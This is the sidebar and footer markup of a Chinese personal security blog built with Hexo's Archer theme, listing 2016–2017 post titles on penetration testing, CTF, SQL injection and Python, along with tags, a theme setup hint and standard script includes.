            <span class="archive-post-date">04/05</span><a class="archive-post-title" href="/2017/04/05/渗透测试中的Bypass技巧/">渗透测试中的Bypass技巧</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/02</span><a class="archive-post-title" href="/2017/04/02/17年4月2日/">17年4月2日</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/27</span><a class="archive-post-title" href="/2017/03/27/各种常见漏洞以及解析/">各种常见漏洞以及解析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/25</span><a class="archive-post-title" href="/2017/03/25/关于逻辑漏洞/">关于逻辑漏洞</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2016 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/06</span><a class="archive-post-title" href="/2016/12/06/好长时间了的一点随感/">这一段时间的感受</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/24</span><a class="archive-post-title" href="/2016/10/24/通过准备ctf所学习到的知识/">通过准备ctf所学习到的知识</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/12</span><a class="archive-post-title" href="/2016/10/12/nmap以及sqlmap的使用/">nmap以及burp的简单使用以及一些基本知识</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/30</span><a class="archive-post-title" href="/2016/09/30/web基本的攻击方法/">服务器的入侵简介以及选择自己适合的语言</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/17</span><a class="archive-post-title" href="/2016/09/17/最近目标/">最近目标</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/27</span><a class="archive-post-title" href="/2016/08/27/web渗透入门-基本入门方法以及sql手工注入/">web渗透-基本入门方法以及sql手工注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/23</span><a class="archive-post-title" href="/2016/08/23/python-web框架django博客开发/">python-web框架django博客开发</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2016/08/17/blog-start/">blog_start</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2016/08/17/python爬取数十万级数据/">python爬取十万级数据</a>
        </li>
    
    </ul></div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="随感及小结"><span class="iconfont-archer">&#xe606;</span>随感及小结</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="硬件安全"><span class="iconfont-archer">&#xe606;</span>硬件安全</span>
    
        <span class="sidebar-tag-name" data-tags="内网渗透"><span class="iconfont-archer">&#xe606;</span>内网渗透</span>
    
        <span class="sidebar-tag-name" data-tags="Web安全"><span class="iconfont-archer">&#xe606;</span>Web安全</span>
    
        <span class="sidebar-tag-name" data-tags="python"><span class="iconfont-archer">&#xe606;</span>python</span>
    
        <span class="sidebar-tag-name" data-tags="Linux"><span class="iconfont-archer">&#xe606;</span>Linux</span>
    
        <span class="sidebar-tag-name" data-tags="tools"><span class="iconfont-archer">&#xe606;</span>tools</span>
    
        <span class="sidebar-tag-name" data-tags="书"><span class="iconfont-archer">&#xe606;</span>书</span>
    
        <span class="sidebar-tag-name" data-tags="机器学习"><span class="iconfont-archer">&#xe606;</span>机器学习</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br>
    1、请确保node版本大于6.2<br>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="Web安全"><span class="iconfont-archer">&#xe60a;</span>Web安全</span>
    
        <span class="sidebar-category-name" data-categories="随感"><span class="iconfont-archer">&#xe60a;</span>随感</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "Yokeen"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


